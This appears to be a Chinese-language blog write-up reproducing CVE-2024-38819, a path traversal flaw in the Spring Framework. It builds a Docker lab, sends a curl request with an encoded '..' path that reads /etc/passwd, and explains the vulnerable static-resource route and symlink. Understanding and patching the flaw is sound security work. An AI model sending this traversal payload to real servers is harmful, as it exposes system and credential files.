CVE-2024-38819:Spring 框架路径遍历 PoC 漏洞复现

操作:

根据CVE-2024-38819:Spring 框架路径遍历 PoC 漏洞搭建复现的靶场环境

拿到环境的源码使用docker搭建

复制代码
cd vuln

创建容器并启动

复制代码
 docker build -t cve-2024-38819-poc .
 docker run -d -p 8080:8080 --name cve-2024-38819-poc cve-2024-38819-poc

注意在创建的时候有些镜像无法拉取到,可以在Dockerfile文件中修改配置使用其他的镜像

使用命令来验证是否存在漏洞

复制代码
curl http://localhost:8080/static/link/%2e%2e/etc/passwd

请求成功返回了 /etc/passwd 文件的内容,证明存在该漏洞

该漏洞利用了路径遍历问题,使攻击者能够访问系统中本不应暴露的文件(如 /etc/passwd)。攻击者能够进一步利用该信息来获取其他敏感数据或执行任意代码。

解析:
  1. 设置静态资源路由 :创建 PathTraversalDemoApplication.java 文件,使用 RouterFunctionFileSystemResource 设置静态文件路由

    复制代码
    public RouterFunction<ServerResponse> staticResourceRouter() {
        return RouterFunctions.resources("/static/**", new FileSystemResource("/app/static/"));
    }

    这段代码创建了一个静态文件资源的路由。当用户访问 /static/** 路径时,系统会从 /app/static/ 目录中提供文件。

  2. 创建符号链接

    复制代码
    RUN ln -s /static /app/static/link

    在 Dockerfile 中,ln -s 命令创建了一个符号链接 /static,指向 /app/static/link。这意味着攻击者可以通过访问 /static/link 来尝试获取指向其他系统路径的文件。

  3. 利用路径遍历漏洞: 通过创建符号链接,攻击者可以尝试构造一个路径遍历的恶意 URL。例如:

    复制代码
    /static/link/%2e%2e/etc/passwd

    其中,%2e%2e%2e 编码的 ..,代表父目录。攻击者通过这种方式尝试从 /app/static/ 目录"跳出"并访问系统的其他目录(如 /etc/passwd),从而获取系统敏感信息。

相关推荐
武子康1 小时前
Java-80 深入浅出 RPC Dubbo 动态服务降级:从雪崩防护到配置中心秒级生效
java·分布式·后端·spring·微服务·rpc·dubbo
舒一笑2 小时前
我的开源项目-PandaCoder迎来史诗级大更新啦
后端·程序员·intellij idea
@昵称不存在3 小时前
Flask input 和datalist结合
后端·python·flask
zhuyasen3 小时前
Go 分布式任务和定时任务太难?sasynq 让异步任务从未如此简单
后端·go
东林牧之4 小时前
Django+celery异步:拿来即用,可移植性高
后端·python·django
YuTaoShao4 小时前
【LeetCode 热题 100】131. 分割回文串——回溯
java·算法·leetcode·深度优先
源码_V_saaskw4 小时前
JAVA图文短视频交友+自营商城系统源码支持小程序+Android+IOS+H5
java·微信小程序·小程序·uni-app·音视频·交友
超浪的晨4 小时前
Java UDP 通信详解:从基础到实战,彻底掌握无连接网络编程
java·开发语言·后端·学习·个人开发
AntBlack5 小时前
从小不学好 ,影刀 + ddddocr 实现图片验证码认证自动化
后端·python·计算机视觉
Pomelo_刘金5 小时前
Clean Architecture 整洁架构:借一只闹钟讲明白「整洁架构」的来龙去脉
后端·架构·rust